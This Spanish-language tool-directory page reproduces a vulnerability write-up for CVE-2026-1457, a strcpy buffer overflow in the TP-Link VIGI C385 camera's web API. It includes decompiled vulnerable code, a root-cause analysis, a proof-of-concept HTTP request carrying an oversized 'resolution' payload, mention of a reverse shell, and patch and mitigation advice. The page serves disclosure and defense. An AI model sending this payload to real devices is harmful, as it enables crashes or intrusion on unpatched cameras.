Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-1457 — Proporciona un análisis detallado y una prueba de concepto para CVE-2026-1457, un desbordamiento de búfer autenticado en la API web de TP-Link VIGI C385 que conduce a la ejecución remota de código. | Kitploit
Herramientas/GitHubGitHub/ii4gsp/cve-2026-1457
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso RemotoExplotación de Binarios
GitHubii4gsp/cve-2026-1457

CVE-2026-1457

Proporciona un análisis detallado y una prueba de concepto para CVE-2026-1457, un desbordamiento de búfer autenticado en la API web de TP-Link VIGI C385 que conduce a la ejecución remota de código.

Ver Repositorio
hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-1457: Ejecución Remota de Código Autenticada en TP-Link VIGI C385

Resumen

CVE-2026-1457 es una vulnerabilidad de desbordamiento de búfer autenticada en la API web de TP-Link VIGI C385 V1. Esta vulnerabilidad permite a atacantes autenticados ejecutar código de forma remota (RCE).

Puntuación CVSS v4.0: 8.5 (Alta)

CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Productos Afectados

Modelo de ProductoVersión Afectada
VIGI C385 V1
< 3.1.1 Build 251124 Rel.50371n

Detalles de la Vulnerabilidad

Ubicación de la Vulnerabilidad

La función set_resolution_18AAD8 utiliza strcpy para copiar la entrada del usuario a un búfer sin validación de longitud, lo que provoca un desbordamiento de búfer.

Análisis del Código Vulnerable

root@kitploit:~
int __fastcall set_resolution_18AAD8(int a1, char a2)
{
  const char *string_origin; // r5
  const char *v4; // r4
  int result; // r0
  char v6[72]; // [sp+0h] [bp-A0h] BYREF
  char v7[88]; // [sp+48h] [bp-58h] BYREF

  memset(v6, 0, sizeof(v6));
  memset(v7, 0, 72);
  string_origin = jso_obj_get_string_origin(a2, (char)"secname");
  v4 = jso_obj_get_string_origin(a2, (char)"resolution");
  sub_1FE6BC((int)"/video/main", (int)v6, 0x48u);
  sub_1FE6BC((int)"/video/minor", (int)v7, 0x44u);
  if ( !strcmp(string_origin, "main") )
  {
    result = strcmp(v4, &v6[29]);
    if ( result )                               // true if v4 is greater than &v6[29]
    {
      sub_1FE6BC((int)"/video/main", (int)v6, 0x48u);
      strcpy(&v6[29], v4);                      // ⚠️ buffer overflow
      sub_1FE804("/video/main", v6, 72);
      return 0;
    }
  }
  else if ( !strcmp(string_origin, "minor") )
  {
    result = strcmp(v4, &v7[29]);
    if ( result )
    {
      sub_1FE6BC((int)"/video/minor", (int)v7, 0x48u);
      strcpy(&v7[29], v4);                      // ⚠️ buffer overflow
      sub_1FE804("/video/minor", v7, 72);
      return 0;
    }
  }
  else
  {
    msg_debug(3, "http_do_setResolution", 3137, "[HTTPD]set resolution param error.\n");
    return -40209;
  }
  return result;
}

Causa Raíz

  1. El búfer v6 se declara con 72 bytes, pero strcpy se ejecuta en la posición &v6[29].
  2. El búfer v7 se declara con 88 bytes, pero strcpy se ejecuta en la posición &v7[29].
  3. La entrada del usuario (v4) no se valida en cuanto a longitud antes de usar strcpy, lo que provoca un desbordamiento de búfer.
  4. El espacio restante del búfer es solo de 43 bytes (v6) y 59 bytes (v7) respectivamente, pero se pueden copiar cadenas más largas.

Escenario de Ataque

Requisitos

  • Sesión autenticada (se requiere un token stok válido)
  • Acceso a la red (misma red o red administrativa)

Vector de Ataque

Un atacante puede explotar la funcionalidad set_resolution del endpoint /ds para enviar cargas útiles maliciosas.

Prueba de Concepto

Ejemplo de Solicitud HTTP

root@kitploit:~
POST /stok=9p73~f9L0fGs33wt3D3XDc)7u)!wt83f/ds HTTP/1.1
Host: 192.168.0.100
Content-Length: 3015
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Origin: https://192.168.0.100
Connection: close

{
  "video": {
    "set_resolution": {
      "secname": "main",
      "resolution": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    }
  },
  "method": "do"
}

Resultado de la Explotación

Este documento no contiene código de explotación ejecutable. La siguiente captura de pantalla demuestra una explotación exitosa que resulta en una conexión de shell inversa:

Reverse Shell Success

Mitigación

Acciones Recomendadas

  1. Actualización de Firmware: Actualice los dispositivos afectados a la versión 3.1.1 Build 251124 Rel.50371n o posterior.

  2. Aislamiento de Red: Si es posible, coloque los dispositivos VIGI C385 en un segmento de red aislado.

  3. Control de Acceso: Restrinja el acceso a la interfaz de administración solo a redes de confianza.

  4. Monitoreo: Supervise el tráfico de red anormal o el comportamiento de los dispositivos.

Medidas Temporales de Mitigación

  • Bloquee el acceso externo a la interfaz de administración web.
  • Utilice credenciales de autenticación sólidas.
  • Desactive los servicios de red innecesarios.

Cronología

  • 2025-04-25: Vulnerabilidad descubierta
  • 2025-08-29: Vulnerabilidad reportada a TP-Link
  • 2026-01-29: Aviso de seguridad publicado
  • 2026-01-29: Divulgación pública

Referencias

  • Aviso de Seguridad de TP-Link
  • CVE-2026-1457

Créditos

Esta vulnerabilidad fue descubierta y analizada por:

  • SeonGoo Lee (classun9)
  • MinSeong Kim (ii4gsp)

de NSHC RedAlert Labs

Descargar herramienta